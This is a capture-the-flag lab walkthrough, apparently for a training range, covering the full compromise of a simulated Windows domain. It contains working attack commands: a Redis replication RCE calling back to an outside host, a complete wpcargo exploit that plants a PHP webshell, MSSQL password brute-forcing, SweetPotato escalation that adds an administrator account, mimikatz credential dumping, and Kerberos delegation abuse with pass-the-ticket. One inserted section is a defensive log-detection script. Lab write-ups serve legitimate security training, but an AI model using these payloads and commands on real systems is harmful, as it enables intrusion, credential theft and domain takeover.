春秋云镜 - Brute4Road - Writeup

Start with an fscan scan

39.99.234.177:6379 open
39.99.234.177:21 open
39.99.234.177:22 open
39.99.234.177:80 open

Port 6379: Redis with unauthenticated access

Exploit it via master-slave replication RCE

python3 redis-rce.py -r 39.99.234.177 -p 6379 -L 42.192.42.48 -P 2333 -f exp.so

SUID privilege escalation

Spotted a SUID base64 binary, which can be used to read the file

base64 "flag01" | base64 --decode

Got the first flag

Tried ifconfig, but it does not show the subnets

Upload cdk

Scan the internal network with fscan

172.22.2.3 DC.xiaorang.lab  Windows Server 2016 Datacenter 14393
172.22.2.7 (already compromised)
172.22.2.16  MSSQLSERVER.xiaorang.lab
172.22.2.18  WORKGROUP\UBUNTU-WEB02 Wordpress
172.22.2.34  CLIENT01

Set up frp to reach the WordPress site on 172.22.2.18

Run wpscan against it

It finds the wpcargo plugin, which has a pre-auth RCE

https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a

import sys
import binascii
import requests
# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'
def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')
text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]
destination_url = 'http://127.0.0.1:8001/'
cmd = 'ls'
# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)
# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))
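
A defender-side counterpart, added here and not part of the original writeup: the barcode.php request above leaves a distinctive trace in the web server's access log, a `filepath=` parameter pointing into the document root, followed by requests to the file that was just written. The script below scans constructed Apache-style access-log lines (sample data, not from the lab) for exactly that sequence; the document root `/var/www/html` is taken from the exploit's own `filepath` value.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample log lines in Apache combined format (not from the lab).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:14:15:01 +0800] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=1x1x1x&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php HTTP/1.1" 200 512 "-" "python-requests/2.31"
10.0.0.5 - - [10/Oct/2023:14:15:02 +0800] "POST /webshell.php?1=system HTTP/1.1" 200 87 "-" "python-requests/2.31"
10.0.0.9 - - [10/Oct/2023:14:16:10 +0800] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=ORDER123&size=2 HTTP/1.1" 200 1890 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:14:16:12 +0800] "GET /?p=12 HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
BARCODE_PATH = "/wp-content/plugins/wpcargo/includes/barcode.php"
DOCROOT = "/var/www/html"  # assumed web root, matching the exploit's filepath


def analyse_access_log(log_text: str) -> list:
    """Return a list of (client_ip, reason, detail) alerts.

    Two signals are raised: barcode.php being called with a filepath parameter
    at all (legitimate barcode rendering does not need it), and any later request
    to a URL path that such a call would have created under the document root.
    """
    alerts = []
    written_paths = set()  # URL paths derived from filepath values inside DOCROOT
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlparse(m["target"])
        query = parse_qs(url.query)
        if url.path.endswith(BARCODE_PATH) and "filepath" in query:
            filepath = query["filepath"][0]
            alerts.append((m["ip"], "barcode.php called with filepath parameter", filepath))
            if filepath.startswith(DOCROOT + "/"):
                written_paths.add(filepath[len(DOCROOT):])
        elif url.path in written_paths:
            alerts.append((m["ip"], "request to file written via barcode.php", url.path))
    return alerts


if __name__ == "__main__":
    for ip, reason, detail in analyse_access_log(SAMPLE_LOG):
        print(f"{ip}: {reason} -> {detail}")
```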

Connect with AntSword (蚁剑)

Read wp-config.php

The database username and password are wpuser / WpuserEha8Fgj9

Connecting to the database through AntSword threw an error

So upload adminer instead

Got the second flag

Another table contained a pile of passwords

Use fscan to brute-force MSSQL on 172.22.2.16 with them

nohup ./fscan_amd64 -h 172.22.2.16 -m mssql -pwdf pass.txt 2>&1 >nohup.out 2>/dev/null

Running Multiple through proxychains4 errored out

The M-series chip keeps running into all sorts of weird problems qwq

So forward its port out instead; then proxychains is not needed

[mssql]
type = tcp
local_ip = 172.22.2.16
local_port = 1433
remote_port = 6433

Got the third flag

Escalated with SweetPotato and brought the host online in Viper

There is a process running as the domain user XIAORANG\Willam

load kiwi
creds_all

Dump the credentials

The plaintext password for XIAORANG.lab\William is Willg1UoO6Jt

But the password seems to have expired, so it cannot be used to log in

This machine has port 3389 open, so create a new user

C:\temp\sweetpotato.exe -a "net user xuxfff P@ssw0rd /add"
C:\temp\sweetpotato.exe -a "net localgroup administrators xuxfff /add"

Then RDP in

With the machine account of MSSQLSERVER in hand, try abusing its constrained delegation

For some reason Rubeus refused to work no matter what = = (probably a .NET version issue)

Switched to kekeo

First request a TGT, then use that TGT to request a service ticket (ST)

tgt::ask /user:MSSQLSERVER$ /domain:xiaorang.lab /rc4:d504224b0664ab93b16c08afecc9f47f
tgs::s4u /tgt:TGT_MSSQLSERVER$@XIAORANG.LAB_krbtgt~xiaorang.lab@XIAORANG.LAB.kirbi /user:Administrator@xiaorang.lab /service:cifs/DC.xiaorang.lab

Then load the ticket with mimikatz (pass-the-ticket)

kerberos::ptt TGS_Administrator@xiaorang.lab@XIAORANG.LAB_cifs~DC.xiaorang.lab@XIAORANG.LAB.kirbi